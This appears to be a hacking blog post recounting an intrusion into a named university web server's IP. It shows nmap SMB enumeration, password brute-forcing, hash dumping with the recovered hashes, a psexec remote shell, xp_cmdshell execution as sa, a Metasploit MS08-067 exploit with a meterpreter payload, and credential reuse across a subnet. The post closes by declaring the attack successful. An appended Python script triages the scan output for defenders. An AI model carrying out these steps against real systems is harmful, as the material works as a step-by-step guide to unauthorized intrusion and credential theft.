Guangxi Normal website (http://202.103.242.241/)

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use msf to exploit the MS08-067 vulnerability against the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the obtained hash to attempt logins across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful: a simple msf + nmap attack~~
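Every weakness in this post was read off nmap's host-script output by eye. As an added example that is not part of the original post, the Python script below parses that output format and turns the smb-enum-users, smb-enum-shares, smb-brute, smb-pwdump and smb-check-vulns results into severity-ranked findings a defender can act on: an unpatched MS08-067, blank or guessable passwords, anonymous READ on IPC$, LM hashes still being stored (a second half of AAD3B435B51404EE means the password is at most 7 characters), and account names enumerable over SMB. The sample text is constructed to mirror the runs above; the function names, severity levels and messages are my own assumptions, not anything nmap or the post defines.

```python
"""Triage the SMB host-script findings from nmap normal output."""
import re
from collections import defaultdict

# Constructed sample modelled on the nmap runs in the post (not captured output).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap scan report for 192.168.1.105
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
"""

REPORT_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?")
LOGIN_RE = re.compile(r"^(\S+):(\S*) => Login was successful$")
PWDUMP_RE = re.compile(r"^(\S+?):(\d+) => ([^:]+):(.+)$")
NO_PASSWORD = "NO PASSWORD"          # pwdump marker for an empty hash
EMPTY_LM_HALF = "AAD3B435B51404EE"   # LM hash of an empty 7-byte block


def parse_host_scripts(text):
    """Map each scanned IP to {script name: [result lines]} taken from its
    'Host script results:' block. Any line not starting with '|' ends a block."""
    hosts = defaultdict(lambda: defaultdict(list))
    ip = script = None
    for raw in text.splitlines():
        m = REPORT_RE.match(raw)
        if m:
            ip, script = m.group(1), None
            continue
        if ip is None or not raw.startswith("|"):
            script = None
            continue
        body = raw.lstrip("|_").strip()
        if body.endswith(":") and ":" not in body[:-1]:      # "| smb-brute:" header
            script = None if raw.startswith("|_") else body[:-1]
            continue
        if script:
            hosts[ip][script].append(body)
        if raw.startswith("|_"):                               # "|_" closes the script
            script = None
    return hosts


def assess(hosts):
    """Turn raw script lines into (ip, severity, script, message) findings."""
    findings = []
    for ip, scripts in sorted(hosts.items()):
        for line in scripts.get("smb-check-vulns", []):
            name, _, status = line.partition(":")
            if status.strip() == "VULNERABLE":
                findings.append((ip, "critical", "smb-check-vulns", f"{name.strip()} is unpatched"))
        for line in scripts.get("smb-brute", []):
            m = LOGIN_RE.match(line)
            if m and m.group(2) == "<blank>":
                findings.append((ip, "critical", "smb-brute", f"account {m.group(1)} has an empty password"))
            elif m:
                findings.append((ip, "high", "smb-brute", f"account {m.group(1)} uses a guessable password"))
        share = None
        for line in scripts.get("smb-enum-shares", []):
            if line.startswith("Anonymous access:"):
                level = line.split(":", 1)[1].strip()
                if level != "<none>":
                    findings.append((ip, "high", "smb-enum-shares", f"share {share} allows anonymous {level}"))
            else:
                share = line
        for line in scripts.get("smb-pwdump", []):
            m = PWDUMP_RE.match(line)
            if not m:
                continue
            user, rid, lm, nt = m.groups()
            if nt.startswith(NO_PASSWORD):
                findings.append((ip, "critical", "smb-pwdump", f"account {user} (RID {rid}) has an empty password"))
            elif not lm.startswith(NO_PASSWORD):
                note = " (password is 7 characters or shorter)" if lm.upper().endswith(EMPTY_LM_HALF) else ""
                findings.append((ip, "medium", "smb-pwdump", f"account {user} stores an LM hash{note}; set NoLMHash"))
        for line in scripts.get("smb-enum-users", []):
            if "Users:" in line:
                users = [u.strip() for u in line.split("Users:", 1)[1].split(",") if u.strip()]
                findings.append((ip, "low", "smb-enum-users", f"{len(users)} account names enumerable over SMB"))
    return findings


if __name__ == "__main__":
    for ip, severity, script, message in assess(parse_host_scripts(SAMPLE_NMAP_OUTPUT)):
        print(f"{ip:16} {severity:8} {script:16} {message}")
```

Feed it the saved normal output of a scan (`nmap -oN`) and every host with a critical finding is one that needs patching or a password reset before anything else; the LM-hash check only fires on hosts where a credentialed smb-pwdump run was done, so it is absent for hosts that were only enumerated anonymously.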